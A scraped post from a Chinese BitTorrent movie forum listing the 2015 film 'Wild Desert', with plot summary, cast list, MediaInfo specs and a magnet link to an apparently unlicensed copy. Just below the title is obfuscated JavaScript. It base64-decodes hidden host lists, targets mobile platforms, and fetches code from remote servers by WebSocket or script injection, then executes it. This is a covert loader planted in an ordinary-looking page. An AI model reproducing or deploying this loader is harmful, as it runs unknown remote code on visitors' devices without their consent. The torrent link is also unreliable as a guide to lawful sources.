心跳戈壁[国语音轨].Wild.Desert.2015.1080p.HDR.WEB-DL.H265.AAC 1.71GB

版主小s 1月前 141

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 心跳戈壁 / Wild Desert
◎年  代 2015
◎产  地 中国大陆
◎类  别 动作 / 冒险
◎语  言 汉语普通话
◎上映日期 2015-08-27(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt5246410/
◎豆瓣评分 4.0/10 (982人评价)
◎豆瓣链接 https://movie.douban.com/subject/26005668/
◎片  长 98分钟
◎导  演 甄人 Ren Zhen (id:1350798)
◎编  剧 甄人 Ren Zhen (id:1350798)
◎演  员 邵兵 Bing Shao (id:1274884)
       董璇 Xuan Dong (id:1276104)
       彭波 Bo Peng (id:1317859)
       陈正华 Zhenghua Chen (id:1350799)
       伊利亚尔·阿不力米提 Ilyar Ablimit (id:1350797)
       李明 Ming Li (id:1274928)
       杨海超 Haichao Yang (id:1350796)
       那临 Lin Na (id:1350795)
       谢宜 Yi Xie (id:1350794)
       地曼·阿巴克夫  (id:1350793)
       李酷娜 Ku-na Li (id:1350792)

◎标  签 西部 / 中国 / 中国电影 / 中国大陆 / 2015 / 冒险 / 烂 / 邵兵

◎简  介
  故事发生在广袤无垠而又荒无人烟的无人区古尔古特大戈壁,佳一(谢宜 饰)、小北京(那临 饰)、眼镜(杨海超 饰)等七名年轻人从不同的城市聚集到此处,准备开始他们的冒险之旅。在一处岔路口,七人兵分两路走散了。                                    
                                佳一和另外两个同伴在寻找大部队的过程中意外遭遇了凶狠邪恶的盗矿者,为了不使自己的行踪暴露,盗矿者们决定杀人灭口,随即对手无寸铁的三人展开了追杀。那一边,天山(邵兵 饰)、强子(彭波 饰)等四人亦在寻找着走散的队友,结果却遭遇了一个手持枪械的神秘人。七人处在性命攸关的边缘,这里既没有庇护,亦没有法律,有的只是弱肉强食的残酷规则。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 131459435980546002706203588078848125437 (0x62E62A9AADE7919F086B6269114729FD)

  4. Complete name                            : 心跳戈壁[email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 1.71 GiB

  8. Duration                                 : 1 h 33 min

  9. Overall bit rate                         : 2 614 kb/s

  10. Encoded date                             : UTC 2021-08-07 13:46:20

  11. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. HDR format                               : SMPTE ST 2086, HDR10 compatible

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 33 min

  21. Bit rate                                 : 2 487 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 816 pixels

  24. Display aspect ratio                     : 2.35:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 25.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.064

  31. Stream size                              : 1.63 GiB (95%)

  32. Default                                  : Yes

  33. Forced                                   : No

  34. Color range                              : Limited

  35. Color primaries                          : BT.2020

  36. Transfer characteristics                 : PQ

  37. Matrix coefficients                      : BT.2020 non-constant

  38. Mastering display color primaries        : R: x=0.708000 y=0.292000, G: x=0.170000 y=0.797000, B: x=0.130000 y=0.046000, White point: x=0.312700 y=0.329000

  39. Mastering display luminance              : min: 0.0000 cd/m2, max: 0 cd/m2


  40. Audio

  41. ID                                       : 2

  42. Format                                   : AAC LC

  43. Format/Info                              : Advanced Audio Codec Low Complexity

  44. Codec ID                                 : A_AAC-2

  45. Duration                                 : 1 h 33 min

  46. Bit rate                                 : 124 kb/s

  47. Channel(s)                               : 2 channels

  48. Channel layout                           : L R

  49. Sampling rate                            : 44.1 kHz

  50. Frame rate                               : 43.066 FPS (1024 SPF)

  51. Compression mode                         : Lossy

  52. Stream size                              : 83.3 MiB (5%)

  53. Language                                 : Chinese

  54. Default                                  : Yes

  55. Forced                                   : No



TAGS 动作 冒险

磁力链:
  • magnet:?xt=urn:btih:D30AC7D6160E2322544848FDE89091CBA0FBDAF6
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回